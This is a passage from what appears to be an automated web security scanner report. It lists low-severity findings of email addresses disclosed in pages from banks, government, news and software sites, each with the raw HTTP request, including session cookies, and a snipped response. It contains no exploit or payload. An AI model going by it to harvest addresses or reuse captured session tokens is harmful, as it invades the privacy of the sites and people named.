Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;

Response

HTTP/1.1 200 OK
Content-Length: 7019
Content-Type: application/x-javascript
Last-Modified: Wed, 03 Nov 2010 19:05:28 GMT
Accept-Ranges: bytes
ETag: "7bbeff138a7bcb1:fc87"
Date: Thu, 03 Feb 2011 01:06:33 GMT
Connection: close

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD_belat
...[SNIP]...

19.83. http://www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.china-iwb.com
Path:   /abcde/Editor/UploadFile/2009522165941674.pdf

Issue detail

The following email address was disclosed in the response:

Request

GET /abcde/Editor/UploadFile/2009522165941674.pdf HTTP/1.1
Host: www.china-iwb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 150614
Content-Type: application/pdf
Last-Modified: Fri, 22 May 2009 08:59:41 GMT
Accept-Ranges: bytes
ETag: "8712e2a4bbdac91:11233f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 01:06:30 GMT
Connection: close

%PDF-1.5
%....
1 0 obj
[/PDF/ImageB/ImageC/ImageI/Text]
endobj
4 0 obj
<</Length 5 0 R
/Filter/FlateDecode
>>
stream
x...]s.....v.\.$. ...aM.;.|....... !.q...$.R...W.G.7..gv.C.7+..p.........>....\.W0r
...[SNIP]...
</Type/Action
/S/URI
/URI(mailto:overseas@julong.com.cn)
>
...[SNIP]...
</Type/Action
/S/URI
/URI(mailto:overseas@julong.com.cn)
>
...[SNIP]...
</Type/Action
/S/URI
/URI(mailto:overseas@julong.com.cn)
>
...[SNIP]...

19.84. http://www.citizensbank.com/online-banking/faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /online-banking/faq.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /online-banking/faq.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 59861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<td>10digitphonenumber@vtext.com</td>
...[SNIP]...
<td>10digitphonenumber@txt.att.net</td>
...[SNIP]...
<td>10digitphonenumber@messaging.sprintpcs.com</td>
...[SNIP]...
<td>10digitphonenumber@tmomail.net</td>
...[SNIP]...
<td>10digitphonenumber@messaging.nextel.com</td>
...[SNIP]...
<td>10digitphonenumber@cingularme.com</td>
...[SNIP]...
<td>10digitphonenumber@vmobl.com</td>
...[SNIP]...
<td>10digitphonenumber@message.alltel.com</td>
...[SNIP]...
<td>10digitphonenumber@mobile.celloneusa.com</td>
...[SNIP]...
<td>10digitphonenumber@omnipointpcs.com</td>
...[SNIP]...
<td>10digitphonenumber@qwestmp.com</td>
...[SNIP]...

19.85. http://www.citizensbank.com/scripts/overlaybox/browserdetectlite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /scripts/overlaybox/browserdetectlite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/overlaybox/browserdetectlite.js HTTP/1.1
Host: www.citizensbank.com
Proxy-Connection: keep-alive
Referer: http://www.citizensbank.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 4213
Content-Type: application/x-javascript
Last-Modified: Tue, 17 Feb 2009 17:05:20 GMT
Accept-Ranges: bytes
ETag: "088d8e92191c91:23f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 21:59:59 GMT

// Browser Detect Lite v2.1
// http://www.dithered.com/javascript/browser_detect/index.html
// modified by Chris Nott (chris@NOSPAMdithered.com - remove NOSPAM)
//
// modified by Michael Lovitt to include OmniWeb and Dreamcast

function BrowserDetectLite() {
   var ua = navigator.userAgent.toLowerCase();
   this.ua = ua;

   // browser nam
...[SNIP]...

19.86. http://www.citizensbank.com/security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /security/

Issue detail

The following email address was disclosed in the response:

Request

GET /security/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:18:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:28:00 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 15127


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<a href="mailto:fraudprevention@citizensbank.com">fraudprevention@citizensbank.com</a>
...[SNIP]...

19.87. http://www.directstartv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=5q1pmeo4qcq80k8jsrsa9kggt5; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Thu, 02-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1461b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=149866862; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=162207399; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Mon, 04-Apr-2011 01:07:14 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta http-equiv="reply-to" content="comments@DirectStarTV.com" />
...[SNIP]...

19.88. http://www.emagazine.com/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emagazine.com
Path:   /view/

Issue detail

The following email address was disclosed in the response:

Request

GET /view/?5489 HTTP/1.1
Host: www.emagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:39 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) mod_perl/1.30 PHP/4.3.4
X-Powered-By: PHP/4.3.4
Set-Cookie: PHPSESSID=ba6bb514b1fca2c3b23a260e9b9739c2; path=/; domain=www.emagazine.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 61787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    <html><head><title>More Sustainable Sushi (By Brita Belli)</title><meta name=
...[SNIP]...
<a href=mailto:.sales@featurewell.com>
...[SNIP]...

19.89. http://www.fdic.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fdic.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.fdic.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:18:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 43093
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSBRDRBD=IBKPGPIAFCHAEGEBGLLPBOMO; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="mailto:communications@fdic.gov?Subject=Feedback%20on%20new%20design" title="Send Feedback on Redesign">
...[SNIP]...

19.90. http://www.filamentgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filamentgroup.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.filamentgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:18:11 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Set-Cookie: exp_last_visit=981353891; expires=Thu, 02-Feb-2012 22:18:11 GMT; path=/
Set-Cookie: exp_last_activity=1296713891; expires=Thu, 02-Feb-2012 22:18:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 22:18:11 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9667

<!DOCTYPE html>
<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="At Filament Group, we build elegant communications and interacti
...[SNIP]...
<a class="email" href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

19.91. http://www.firstnational.com/001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html

Issue detail

The following email address was disclosed in the response:

Request

GET /001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 27271
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:22:36 GMT
Accept-Ranges: bytes
ETag: "08e399c16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:43 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<a title="" href="mailto:wealthadvisors@fnni.com" target="_blank">
...[SNIP]...

19.92. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

Issue detail

The following email address was disclosed in the response:

Request

GET /001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Content-Length: 31127
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 20:23:00 GMT
Accept-Ranges: bytes
ETag: "0aa87aa16b8cb1:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:18:33 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<a href="mailto:firstnational@fnni.com?subject=Mortgage Inquiry" target="_blank">
...[SNIP]...

19.93. http://www.firstnational.com/config/html/en/js/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /config/html/en/js/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /config/html/en/js/dragdrop.js HTTP/1.1
Host: www.firstnational.com
Proxy-Connection: keep-alive
Referer: http://www.firstnational.com/001/html/en/personal/personal.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP

Response

HTTP/1.1 200 OK
Content-Length: 29617
Content-Type: application/x-javascript
Last-Modified: Tue, 02 May 2006 18:47:26 GMT
Accept-Ranges: bytes
ETag: "073ddb186ec61:f17"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 21:59:52 GMT

// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// See scriptaculous.js for full license.

/*--------------------------------------------------------------------------*/

var Droppables = {
drops: [],

remove: function(element) {
this.
...[SNIP]...

19.94. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<a href="mailto:editorial@fis.com">editorial@fis.com</a>
...[SNIP]...

19.95. http://www.forum-software.org/tag/ipboard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forum-software.org
Path:   /tag/ipboard

Issue detail

The following email address was disclosed in the response:

Request

GET /tag/ipboard HTTP/1.1
Host: www.forum-software.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:47 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Set-Cookie: SESS280d8e8069f9a940cd2b7fa808fc752e=0d50d9dee0f91c069baeb303e13f8523; expires=Sat, 26-Feb-2011 04:40:07 GMT; path=/; domain=.forum-software.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href='mailto:webmaster@forum-software.org'>webmaster@forum-software.org</a>
...[SNIP]...

19.96. http://www.gnu.org/copyleft/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /copyleft/gpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /copyleft/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:50 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 03 Feb 2011 01:06:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

19.97. http://www.gnu.org/licenses/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:49 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:00:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

19.98. http://www.gnu.org/licenses/licenses.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/licenses.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/licenses.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:50 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 03 Feb 2011 01:06:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 28294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a
href="/licenses/license-list.html#LicensingMailingList">&lt;licensing@fsf.org&gt;
mailing list</a>
...[SNIP]...
<a href="mailto:licensing@gnu.org">
...[SNIP]...
<a
href="mailto:licensing@fsf.org">&lt;licensing@fsf.org&gt;</a>
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

19.99. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=-qUnohNObFQ;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 01:15:42 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

19.100. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=DLDUrVQYtAM;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 01:15:45 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

19.101. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /business/2011/jan/11/offshore-oil-industry-white-house

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:50 GMT
Server: Apache
X-GU-jas: 07-16121
X-GU-PageRenderer: DefaultPageRenderer
Content-Language: en
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 03
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Length: 98316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l
...[SNIP]...
<a href="mailto:environment@guardian.co.uk">environment@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:reader@guardian.co.uk">reader@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:letters@guardian.co.uk">letters@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:environment@guardian.co.uk">environment@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:reader@guardian.co.uk">reader@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:letters@guardian.co.uk">letters@guardian.co.uk</a>
...[SNIP]...
<a href="mailto:userhelp@guardian.co.uk">userhelp@guardian.co.uk</a>
